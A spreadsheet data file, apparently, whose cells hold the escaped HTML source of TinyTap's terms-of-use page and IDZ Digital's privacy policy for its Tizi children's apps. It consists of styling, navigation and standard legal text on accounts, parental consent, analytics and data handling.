	margin-bottom: 8px;
-webkit-transition: all 0.3s linear;
     -khtml-transition: all 0.3s linear;
       -moz-transition: all 0.3s linear;
         -o-transition: all 0.3s linear;
            transition: all 0.3s linear;
}
.appStore-Button:hover {
		background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #8FE483), color-stop(1, #519448) );
	background:-moz-linear-gradient( center top, #8FE483 5%, #519448 100% );
	filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8FE483', endColorstr='#519448');
	background-color:#8FE483;
		color:</t>
  </si>
  <si>
    <t>#C9C9FF;
	text-decoration:none;
	-moz-box-shadow:inset 2px 2px 0px 0px #519448;
	-webkit-box-shadow:</t>
  </si>
  <si>
    <t>2px 2px 0px 0px #519448;
	box-shadow: 2px 2px 0px 0px #519448;
}
.appStore-MoreInfoButton {
	padding: 2px 10px 2px 10px;
	-moz-box-shadow:inset 0px 1px 0px 0px #519448;
	-webkit-box-shadow:inset</t>
  </si>
  <si>
    <t>0px 1px 0px 0px #519448;
	box-shadow:inset 0px 1px 0px 0px #519448;
		background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #8FE483), color-stop(1, #68BD5C) );
	background:-moz-linear-gradient( center top, #8FE483 5%, #68BD5C 100% );
	 filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8FE483', endColorstr='#68BD5C');
	background-color:#8FE483;
		-moz-border-radius:7px;
	-webkit-border-radius:7px;
	border-radius:7px;
	display:inline-block;
	color:#FFFFFF;
	font-family:Trebuchet MS;
	font-size:12px;
	font-weight:normal;
	text-decoration:none;
	text-shadow:1px 1px 0px #FFFFFF;
	margin-top: 4px;
}
.appStore-MoreInfoButton:hover {
		background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #8FE483), color-stop(1, #519448) );
	background:-moz-linear-gradient( center top, #8FE483 5%, #519448 100% );
	filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8FE483', endColorstr='#519448');
	background-color:#8FE483;
		color: #C9C9FF;
	text-decoration:none;
}
.iTunesStore-Button {
	padding: 5px 20px 5px 20px;
	-moz-box-shadow:inset</t>
  </si>
  <si>
    <t>0px 1px 0px 0px #519448;
	-webkit-box-shadow:inset 0px 1px 0px 0px #519448;
	box-shadow:inset 0px 1px</t>
  </si>
  <si>
    <t>0px 0px #519448;
		background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #8FE483), color-stop(1, #68BD5C) );
	background:-moz-linear-gradient( center top, #8FE483 5%, #68BD5C 100% );
	filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8FE483', endColorstr='#68BD5C');
	background-color:#8FE483;
		-moz-border-radius:5px;
	-webkit-border-radius:5px;
	border-radius:5px;
	border:0px solid #84BBF3;
	display:inline-block;
	color:#FFFFFF;
	font-family:Trebuchet MS;
	font-size:16px;
	font-weight:bold;
	padding:4px 8px;
	text-decoration:none;
	text-shadow:1px 1px 0px #FFFFFF;
	margin-top: 8px;
}
.iTunesStore-Button:hover {
		background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #8FE483), color-stop(1, #519448) );
	background:-moz-linear-gradient( center top, #8FE483 5%, #519448 100% );
	filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8FE483', endColorstr='#519448');
	background-color:#8FE483;
		color: #C9C9FF;
	text-decoration:none;
}
&lt;/style&gt;
&lt;style type="text/css"&gt;.broken_link, a.broken_link {
	text-decoration: line-through;
}&lt;/style&gt;&lt;link rel="icon" href="https://blog.tinytap.com/wp-content/uploads/2021/06/favicon.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://blog.tinytap.com/wp-content/uploads/2021/06/favicon.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://blog.tinytap.com/wp-content/uploads/2021/06/favicon.png" /&gt;
&lt;meta name="msapplication-TileImage" content="https://blog.tinytap.com/wp-content/uploads/2021/06/favicon.png" /&gt;
&lt;style type="text/css" id="wp-custom-css"&gt;h1 {
	font-size:38px;
}
.team-columns, .team-columns p{
	color: #999999;
}
.team-columns strong{
	font-family: mikadobold, Helvetica,Arial,sans-serif;
}
.team_info, p.team_info {
	min-height: 130px;
}&lt;/style&gt;&lt;/head&gt;
&lt;body class="page-template-default page page-id-4932 page-parent fpt-template-NewTinyTap page-terms-of-use singular"&gt;
&lt;div id="fb-root"&gt;&lt;/div&gt;
&lt;script&gt;(function(d, s, id) {
    var js, fjs = d.getElementsByTagName(s)[0];
    if (d.getElementById(id)) return;
    js = d.createElement(s); js.id = id;
    js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&amp;appId=398907120149017";
    fjs.parentNode.insertBefore(js, fjs);
    }(document, 'script', 'facebook-jssdk'));&lt;/script&gt;
&lt;div id="fixedHeader"&gt;
&lt;header id="header"&gt;
&lt;a href="https://www.tinytap.com/" id="logo"&gt;&lt;img title="" width="50" src="https://static.tinytap.it/media/images/site/header/logo-white.svg" /&gt;&lt;/a&gt;
&lt;div id="nav-position"&gt;
&lt;ul id="top-social"&gt;
&lt;li id="headerFbLike"&gt;
&lt;div class="fb-like" data-href="https://www.facebook.com/pages/TinyTap/402338363126339" data-send="false" data-layout="button_count" data-width="50" data-show-faces="false"&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul id="headerMenuList"&gt;
&lt;li id="homeMenu" class="selected"&gt;
&lt;a href="https://www.tinytap.com/"&gt;Play&lt;/a&gt;
&lt;/li&gt;
&lt;li id="gamesMenu"&gt;
&lt;a href="https://www.tinytap.com/community/profile/me/"&gt;Create&lt;/a&gt;
&lt;/li&gt;
&lt;li id="blogMenu"&gt;
&lt;a style="border-bottom: white 3px solid;" href="https://blog.tinytap.com"&gt;Blog&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div id="searchBox"&gt;
&lt;form role="search" method="get" class="search-form" action="https://blog.tinytap.com/"&gt;
&lt;label&gt;
&lt;input type="search" id="searchInput" class="search-field" placeholder="Search the Blog" value="" name="s" title="" /&gt;
&lt;/label&gt;
&lt;input id="searchButton" type="submit" class="search-submit" value="Search" /&gt;
&lt;/form&gt;
&lt;/div&gt;
&lt;nav id="access" role="navigation"&gt;
&lt;div class="menu-top-container"&gt;&lt;ul id="menu-top" class="menu"&gt;&lt;li id="menu-item-7" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7"&gt;&lt;a href="https://www.tinytap.com/content/"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6"&gt;&lt;a href="https://www.tinytap.com/site/about/"&gt;About&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-4" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4"&gt;&lt;a href="https://blog.tinytap.com/"&gt;Blog&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-4832" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4832"&gt;&lt;a href="https://blog.tinytap.com/?page_id=2444"&gt;The TinyTap Team&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-4833" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4833"&gt;&lt;a</t>
  </si>
  <si>
    <t xml:space="preserve">href="https://blog.tinytap.com/tinytap-screenshots/"&gt;TinyTap Press Kit&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-4834" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4834"&gt;&lt;a href="https://blog.tinytap.com/tinytap-trusted-teachers/"&gt;TinyTap Trusted Teachers!&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt; &lt;/nav&gt;
&lt;div class="clearfix"&gt;&lt;/div&gt;&lt;/div&gt;
&lt;/header&gt;
&lt;/div&gt;
&lt;div id="wrapper"&gt;
&lt;div id="main"&gt;
&lt;div id="primary"&gt;
&lt;div id="content" role="main"&gt;
&lt;h1&gt;Terms of Use and Privacy Policy&lt;/h1&gt;
&lt;p&gt;&lt;span style="font-weight: 400;"&gt;PLEASE CAREFULLY READ OUR PRIVACY POLICY, WHICH IS INCORPORATED BY REFERENCE, BEFORE USING TinyTap.   These Terms affect your legal rights and obligations.   If you do not agree to be bound by all of these Terms, do not access or use the Service.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Terms of Service &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;TinyTap, Ltd.  (“&lt;strong&gt;TinyTap&lt;/strong&gt;” or “&lt;strong&gt;us&lt;/strong&gt;,” “&lt;strong&gt;our&lt;/strong&gt;,” “&lt;strong&gt;we&lt;/strong&gt;”) is the creator and owner of a social platform that enables users to access, create, and share educational, interactive content and applications (the “&lt;strong&gt;Platform&lt;/strong&gt;”) provided through TinyTap&amp;#8217;s website and mobile application (collectively &amp;#8220;&lt;strong&gt;Site&lt;/strong&gt;&amp;#8220;).  </t>
  </si>
  <si>
    <t>These Terms of Services (the “&lt;strong&gt;Terms&lt;/strong&gt;”) govern your access to and use of the Site and Services (as defined herein) and all content (the “&lt;strong&gt;Content&lt;/strong&gt;,” as further defined below) and services available through the Site (the “&lt;strong&gt;Services&lt;/strong&gt;”).   The Terms apply to all schools, school districts, educational and other institutions, including trained institutional staff members who are authorized to access the Services on behalf of a school, school district or other institution (each, a “&lt;strong&gt;School&lt;/strong&gt;”), as well as individuals who are non-School users of the Services (Schools and individuals, referred to here as “&lt;strong&gt;user&lt;/strong&gt;,” “&lt;strong&gt;you&lt;/strong&gt;,” or “&lt;strong&gt;your&lt;/strong&gt;”). Any minor child you permit to use the Platform and/or Services, subject to the terms hereof shall be referred to as a “&lt;strong&gt;Child&lt;/strong&gt;”.&lt;/p&gt;
&lt;p&gt;If you are registering on behalf of a School, you represent that: (i) you are authorized to enter into, and bind the School to these Terms and register for the Platform and Services; (ii) you are solely responsible for ensuring that these Terms are in compliance with all laws, rules, and regulations applicable to you and the School and the right to access the Platform and Services is revoked where these Terms or use of the Platform and Services is prohibited; (iii) you do not create or maintain an account on behalf of a Child if you or the School have not obtained prior written consent from the Child&amp;#8217;s parent or legal guardian (“&lt;strong&gt;Parent&lt;/strong&gt;”).</t>
  </si>
  <si>
    <t xml:space="preserve">(&amp;#8220;&lt;strong&gt;Parental Consent&lt;/strong&gt;&amp;#8220;). If you have created an account on behalf of a Child without having obtained Parental Consent,  you hereby agree to immediately cease any and all use of and activity on such account and delete such account from our Platform by visiting our website or contacting us at help @ tinytap.it.&lt;/p&gt;
&lt;p&gt;Please read these Terms carefully. These Terms govern your access to and use of the Platform and Services.  </t>
  </si>
  <si>
    <t xml:space="preserve">By accessing our Platform and/or using our Services you signify your consent to these Terms. The way we collect, process and transfer Personal Information (as defined in the Privacy Notice) is detailed in our Privacy Notice. Changes may be made to these Terms from time to time.  </t>
  </si>
  <si>
    <t>Your continued use of the Platform and/or Services will be deemed acceptable to the amended or updated Terms.   If you do not agree to any of these Terms, please do not click the button marked “I agree” or use the Platform and/or Services.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Account Registration &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; In order to use most of our Services, you will be required to create an account.</t>
  </si>
  <si>
    <t>Your account allows you to use all the Platform and Services, subject to these Terms and our Privacy Notice. TinyTap reserves the right to refuse to allow a user to open an account for any reason, or to limit the number of accounts a School can establish on the Services, all in its sole discretion.&lt;/p&gt;
&lt;p&gt;You may also access the Services by logging in through approved third-party logins, such as Facebook and Google. We may change the method of registration at our discretion.</t>
  </si>
  <si>
    <t>By accessing the Services through approved third-party login, you represent and warrant that the third-party login account is yours and you have full rights to provide us with the information in this account.&lt;/p&gt;
&lt;p&gt;Children may access the Services through a subaccount created on their behalf by their Parent, Group Leader (as defined below) or by their School, subject to the School or Group Leader&amp;#8217;s written confirmation to TinyTap of receipt of Parental Consent in respect of each Child, before the creation of a sub-account for such Child. The School or Group Leader shall at all times remain liable for all conduct under that subaccount.   Entities or individuals other than Schools, Group Leader or Parents may not use the Services on behalf of children.&lt;/p&gt;
&lt;p&gt;When you create a user account (including as a Parent or on behalf of a School or other institution), you will be asked to provide a valid email address.&lt;/p&gt;
&lt;p&gt;Certain Services, such as creating games and use of certain games and courses, may be available without account registration.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">You are fully and solely responsible for the security of your computer system and all activity on your account, even if such activities were not completed by you.   You agree to notify TinyTap immediately of any unauthorized use of your TinyTap account or password.   TinyTap will not be liable for any losses or damages arising from unauthorized use of your account or password, and you agree to indemnify and hold TinyTap harmless for any improper or illegal use of your account, including any charges and/or taxes incurred, unless you have notified us via email at help @tinytap.it that your account has been compromised and have requested us to block access to it.  </t>
  </si>
  <si>
    <t>We do not police for, and cannot guarantee that we will learn or prevent any inappropriate use of the Platform and/or Services.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Termination of Account&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Upon termination, suspension or expiration of the Agreement for any reason, TinyTap may terminate your access to your account at its sole discretion.&lt;/p&gt;
&lt;p&gt;TinyTap may terminate your account if you violate any of these Terms.&lt;/p&gt;
&lt;p&gt;Upon termination or suspension of your account, you shall not have any further access to any Content (as defined below) that may be available through your account. Any data associated with your account, including any User Content (as defined below), may, at TinyTap’s sole discretion: (i) be deleted from TinyTap and removed from any public area of the Services; or (ii) remain available on the Platform, and accessible to TinyTap users and third parties subject to these Terms.&lt;/p&gt;
&lt;p&gt;If TinyTap believes, in its sole discretion, that a violation of these Terms or any illegal or inappropriate usage or behavior has occurred, we may take any other corrective action we deem appropriate.   We reserve the right to investigate suspected violations of these Terms or illegal and inappropriate usage or behavior regarding the Platform and Services.</t>
  </si>
  <si>
    <t xml:space="preserve">We will fully cooperate with any law enforcement investigation or court order requesting or directing us to disclose the identity, behavior or Content (including User Content) of anyone believed to have violated these Terms or to have engaged in illegal behavior.   Any suspension or termination of your account shall not affect your obligations under these Terms (including but not limited to ownership, indemnification, any representations and warranties made by you, and limitation of liability), which by their sense and context are intended to survive such suspension or termination.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Services&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You may use the Platform, as well as the Content and Services provided through it, on your own behalf and/or for the purpose of offering children (subject to Parental Consent as specified herein) educational games, as available on the Platform and/or to create your own educational games. TinyTap may, in its sole discretion and at any time, discontinue providing any part of the Platform and/or Services without notice.&lt;/p&gt;
&lt;p&gt;Use of the Services and access to the Platform is void where prohibited by law, regulation or any other obligation.  </t>
  </si>
  <si>
    <t xml:space="preserve">By using the Site and/or Services, you represent and warrant that (a) all registration information you submit is truthful and accurate; (b) you will maintain the accuracy of such information; (c) you are 18 years of age or older and have the legal ability to form a binding contract; (d) your use of the Platform and Services does not violate any applicable law or regulation or any obligation you may have, including to a third party; (e) you are solely responsible for obtaining any Parental Consent for each Child you give access to a sub-account, as required; and (f) YOU WILL NOT ADD ANY SPECIAL CATEGORIES OF DATA (AS SUCH TERM IS DEFINED IN REGULATION 2016/679 OF THE EUROPEAN PARLIAMENT AND OF THE COUNCIL OF 27 APRIL 2016 ON THE PROTECTION OF NATURAL PERSONS WITH REGARD TO THE PROCESSING OF PERSONAL DATA AND ON THE FREE MOVEMENT OF SUCH DATA, AND REPEALING DIRECTIVE 95/46/EC (GENERAL DATA PROTECTION REGULATION) (&amp;#8220;&lt;strong&gt;GDPR&lt;/strong&gt;&amp;#8220;) AND IF YOU DO ADD ANY SPECIAL CATEGORIES OF DATA, YOU HEREBY REPRESENT AND WARRANT THAT YOU HAVE OBTAINED EXPLICIT CONSENT IF AND AS REQUIRED UNDER APPLICABLE LAW AND THAT YOU SHALL BE SOLELY RESPONSIBLE AND LIABLE FOR ANY SUCH DATA, INCLUDING IN THE EVENT OF ANY DATA BREACH BY TINYTAP.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;TinyTap hereby grants you with a non-exclusive and non-transferable right to use the Platform and/or Services, in accordance with and subject to these Terms.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Content and User Content&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Certain types of content may be made available through the Platform and/or Services.  </t>
  </si>
  <si>
    <t xml:space="preserve">“&lt;strong&gt;Content&lt;/strong&gt;” as used in these Terms means, collectively, all the content on or made available through the Platform and/or Services and any modifications or derivatives of the foregoing.&lt;/p&gt;
&lt;p&gt; The Services allow you to add certain content including data, text, files, information, usernames, additional educational content (“&lt;strong&gt;Game&lt;/strong&gt;”), graphics, audio recordings, voice recordings profiles, links, images, logos, pictures, photos, video&amp;#8217;s, comments, reviews, ratings and other content or materials (“&lt;strong&gt;User Content&lt;/strong&gt;”). You are fully and solely responsible for any User Content you submit through the Services.  </t>
  </si>
  <si>
    <t xml:space="preserve">You represent and warrant that any such User Content complies with all applicable law, that you have all necessary rights to submit any such User Content through the Services and that no such User Content infringes or violates any third-party intellectual property rights, privacy or publicity rights, or moral rights. You further represent and warrant that YOU WILL NOT ADD AND/OR UPLOAD ANY SPECIAL CATEGORIES OF DATA TO THE PLATFORM. TinyTap has no obligation to accept, display, review or maintain any User Content.  </t>
  </si>
  <si>
    <t>Moreover, TinyTap reserves the right to remove and permanently delete or hide any Content, including any User Content submitted or modified by any user, without notice, and for any reason. WE DO NOT ENDORSE ANY CONTENT (INCLUDING WITHOUT LIMITATION ANY USER CONTENT) OR ANY OPINION, RECOMMENDATION, OR ADVICE EXPRESSED IN ANY USER CONTENT, AND WE EXPRESSLY DISCLAIM ANY AND ALL LIABILITY IN CONNECTION WITH ANY USER CONTENT.&lt;/p&gt;
&lt;p&gt;TinyTap may, at its sole discretion, choose to monitor User Content for inappropriate or illegal behavior, including through automatic means; provided, however, that TinyTap reserves the right to treat User Content as content stored at the direction of users for which TinyTap will not exercise editorial control except when violations are directly brought to TinyTap’s attention.   TinyTap has the right to edit, delete, distort, modify or move User Content from the Site and/or Services without notice for any reason at any time.&lt;/p&gt;
&lt;p&gt;Content on the Site comes from a variety of sources, including</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE HTML&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;title&gt;Privacy Policy Tizi Apps - IDZ Digital Pvt Ltd&lt;/title&gt;
 &lt;meta charset="utf-8"&gt;
  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
  &lt;link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css"&gt;
  &lt;link rel="stylesheet" href="css/navbar.css"&gt;
  &lt;link rel="stylesheet" href="css/style.css"&gt;
  &lt;link rel="shortcut icon" href="img/favicon.ico" /&gt;
  &lt;style&gt;
	span {
      text-decoration: underline;
      font-size: 20px;
	}
	.para { font-family: VAG-Rounded-Thin; font-size: 18px; color: #5A5A5A; overflow: auto; }
  &lt;/style&gt;
&lt;/head&gt;
&lt;body class="hero-anime"&gt;
  &lt;style&gt;_x005F_x000D_
.nav-item { position: relative; }_x005F_x000D_
@media (min-width: 768px){_x005F_x000D_
  .navbar-expand-md .navbar-nav .dropdown-menu {_x005F_x000D_
    position: absolute;_x005F_x000D_
  }_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;div class="navigation-wrap bg-light start-header start-style"&gt;_x005F_x000D_
		&lt;div class="container"&gt;_x005F_x000D_
			&lt;div class="row"&gt;_x005F_x000D_
				&lt;div class="col-12"&gt;_x005F_x000D_
					&lt;nav class="navbar navbar-expand-md navbar-light"&gt;_x005F_x000D_
					_x005F_x000D_
						&lt;a class="navbar-brand" href="https://www.idzdigital.com/"&gt;&lt;img src="img/Logo-white.png" alt="IDZ Digital Logo"&gt;&lt;/a&gt;	_x005F_x000D_
						_x005F_x000D_
						&lt;button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"&gt;_x005F_x000D_
							&lt;span class="navbar-toggler-icon"&gt;&lt;/span&gt;_x005F_x000D_
						&lt;/button&gt;_x005F_x000D_
						_x005F_x000D_
						&lt;div class="collapse navbar-collapse" id="navbarSupportedContent"&gt;_x005F_x000D_
							&lt;ul class="navbar-nav ml-auto py-4 py-md-0"&gt;_x005F_x000D_
								&lt;!--&lt;li class="nav-item pl-4 pl-md-0 ml-0 ml-md-4 active"&gt;_x005F_x000D_
									&lt;a class="nav-link dropdown-toggle" data-toggle="dropdown" href="#" role="button" aria-haspopup="true" aria-expanded="false"&gt;Home&lt;/a&gt;_x005F_x000D_
									&lt;div class="dropdown-menu"&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Action&lt;/a&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Another action&lt;/a&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Something else here&lt;/a&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Another action&lt;/a&gt;_x005F_x000D_
									&lt;/div&gt;_x005F_x000D_
								&lt;/li&gt;--&gt;_x005F_x000D_
								&lt;li id="home" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="/"&gt;Home&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
								&lt;li id="about" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="about.php"&gt;About Us&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
								&lt;!--&lt;li class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link dropdown-toggle" data-toggle="dropdown" href="#" role="button" aria-haspopup="true" aria-expanded="false"&gt;Our Apps&lt;/a&gt;_x005F_x000D_
									&lt;div class="dropdown-menu"&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Kidlo Apps&lt;/a&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Tizi Apps&lt;/a&gt;_x005F_x000D_
									&lt;/div&gt;_x005F_x000D_
								&lt;/li&gt;--&gt;_x005F_x000D_
								&lt;li</t>
  </si>
  <si>
    <t>id="why-us" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="why-us.php"&gt;Why Us&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
								&lt;li id="career" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="careers.php"&gt;Careers&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
								&lt;li id="internships" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="internships.php"&gt;Internships&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
								&lt;li id="contact" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="contact.php"&gt;Contact&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
							&lt;/ul&gt;_x005F_x000D_
						&lt;/div&gt;_x005F_x000D_
						_x005F_x000D_
					&lt;/nav&gt;		_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;	
  &lt;div class="container" style="padding-top:140px;padding-bottom:50px;"&gt;
	&lt;h1 class="main-h1"&gt;Privacy Policy&lt;/h1&gt;
	&lt;p id="para"&gt;This is the privacy policy for all apps belonging to Tizi Family developed and owned by IDZ Digital Private Limited ("IDZ Digital Private Limited", "we", or "us").</t>
  </si>
  <si>
    <t xml:space="preserve">We value the privacy of the people who are using the apps, websites and have, thus, created this Privacy Policy (the "Privacy Policy") to show our commitment towards safeguarding your privacy. Your privacy is important to us, and we take it seriously. Please read our Privacy Policy below and let us know if you have any questions or other feedback regarding it.&lt;br&gt;
	</t>
  </si>
  <si>
    <t>By using our apps, websites or any services linked to them, you agree to our Privacy Policy and Terms of Service.
	 &lt;/p&gt;
	&lt;h3&gt;Your data:&lt;/h3&gt;			
	&lt;p id="para"&gt;As a company, we do not collect any Personal Information like email address, birth date or time, age, name, phone number, address, etc., from the users. If we do happen to obtain any personal information, including emails or phone numbers obtained through support requests or other correspondence, it will be treated with the strictest confidentiality.</t>
  </si>
  <si>
    <t>We use Google's G Suite for Business for our emails.&lt;/p&gt;
	&lt;h3&gt;Analytics:&lt;/h3&gt;
	&lt;p id="para"&gt;We make use of analytics services like Google Firebase. The kind of information collected includes the type of device or version of the OS you are using, app crash report, and general pattern of app use. It should be noted that at NO point in time shall your Personal Information be linked to the cookies or videos (Non-Personal Information) sent from your device to the analytics services so that your privacy is always kept protected.</t>
  </si>
  <si>
    <t xml:space="preserve">Google Firebase have their own Privacy Policies for the information they collect from the device via an app. Nonetheless, we seek to protect the integrity of our site and welcome any feedback about these sites. The links to their Privacy Policies are given below:&lt;/p&gt;
	</t>
  </si>
  <si>
    <t>&lt;p id="para"&gt;Google Firebase&lt;br&gt;
	We use the tool Firebase in some of our apps. This is a real-time database that we use for real-time data exchange and storage in our app to improve and develop our app. The user data is transmitted to Firebase anonymously.</t>
  </si>
  <si>
    <t>Firebase is a Google subsidiary and is based in San Francisco (CA), USA.
	 Find the Firebase privacy policy here: &lt;a href = "https://www.firebase.com/terms/privacy-policy.html" target="_blank"&gt;https://www.firebase.com/terms/privacy-policy.html&lt;/a&gt; &lt;/p&gt;
	&lt;p id="para"&gt;In all of the above cases and purposes, we may analyze, profile and segment all collected data in anonymized form.&lt;/p&gt;
	&lt;h3&gt;Cookies:&lt;/h3&gt;
	&lt;p id="para"&gt;We do not set any cookies on your device. Third party analytics providers mentioned above may set cookies.</t>
  </si>
  <si>
    <t>&lt;/p&gt;
	&lt;h3&gt;Internet permissions:&lt;/h3&gt;
	&lt;p id="para"&gt;Our apps do typically require internet permissions, for the purpose of downloading additional content for the app, providing links to the app store entry of our other apps, display advertising of our own products wherever applicable and to collect anonymous usage information for analytics as mentioned above.&lt;/p&gt;
	&lt;h3&gt;Advertising:&lt;/h3&gt;
	&lt;p id="para"&gt;We may occasionally promote our other apps/games within our apps.&lt;/p&gt;
	&lt;h3&gt;In-app purchases:&lt;/h3&gt;
	&lt;p id="para"&gt;Our apps may contain in-app purchases (IAP’s) or Subscriptions.&lt;/p&gt;
	&lt;h3&gt;Social media:&lt;/h3&gt;
	&lt;p id="para"&gt;Our apps interact with social sites like Facebook, Instagram, Whatsapp, etc to share content from our apps/websites. At no point of time do we collect any information from your social media accounts in any way.&lt;/p&gt;
	&lt;h3&gt;Non-Advertising based apps:&lt;/h3&gt;
	&lt;p id="para"&gt;In case of apps in which no third party ads are there, then the above points related to advertising and ad providers do not apply.&lt;/p&gt;
	&lt;h3&gt;Other companies and public authorities:&lt;/h3&gt;
	&lt;p id="para"&gt;In order to combat fraud and illegal activity, we may exchange data with other companies and organizations and provide it to public authorities in response to lawful requests.&lt;/br&gt;
	We may also disclose your data based on your consent, to comply with the law or to protect the rights, property or safety of us, our players or others.&lt;/p&gt;
	&lt;h3&gt; Age limitations:&lt;/h3&gt;
	&lt;p id="para"&gt;We do not knowingly collect or solicit personal data about or direct or target interest-based advertising to anyone under the age of 13 or knowingly allow such persons to use our Services.</t>
  </si>
  <si>
    <t>If you are under 13, please do not send any data about yourself to us, including your name, address, telephone number, or email address. No one under the age of 13 may provide any personal data. If we learn that we have collected personal data about a child under age 13, we will delete that data as quickly as possible.</t>
  </si>
  <si>
    <t>If you believe that we might have any data from or about a child under the age of 13, please contact us.&lt;/br&gt;
	&lt;br&gt;We do not knowingly contact or do business with children under 13 years of age. The in-app purchases are available only after a parental gate. If a parent/guardian becomes aware that a child under the age of 13 has attempted to contact and/or do business with us, please advise us by email at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="99eaece9e9f6ebedd9f0fde3fdf0fef0edf8f5b7faf6f4"&gt;[email&amp;#160;protected]&lt;/a&gt; so that we may rectify the situation.&lt;/p&gt;
	&lt;h3&gt;Changes to Privacy Policy:&lt;/h3&gt;
	&lt;p id="para"&gt;We reserve the right to modify our Privacy Policy at any time simply by posting such modification on this site and without any other notification.</t>
  </si>
  <si>
    <t>Any such modification will be effective immediately upon posting on this site. &lt;/br&gt;
	&lt;br&gt;The use of the information we collect is always subject to the Privacy Policy that is in effect at the time when this information is collected. You are advised to refer to the Privacy Policy from time to time so that you are always in sync with our current privacy practices.&lt;/p&gt;
	&lt;h3&gt;Contacting Us:&lt;/h3&gt;
	&lt;p class="para"&gt;If there are any questions regarding this privacy policy, you may contact us using the information below.&lt;br&gt;
	IDZ Digital Private Limited&lt;br&gt;
	607, Western Edge II, Borivali East, Mumbai 400066, India&lt;br&gt;
	Email: support at idzdigital.com (Replace at with @ and remove spaces)&lt;br&gt;
	&lt;/p&gt;
	&lt;p class="para"&gt;This Privacy Policy was last modified on Feb 20, 2020.&lt;/p&gt;&lt;br&gt;
  &lt;/div&gt;					 
 &lt;style&gt;_x005F_x000D_
.socio-icons {width:48px;}_x005F_x000D_
.list-group-item {_x005F_x000D_
    padding: .75rem</t>
  </si>
  <si>
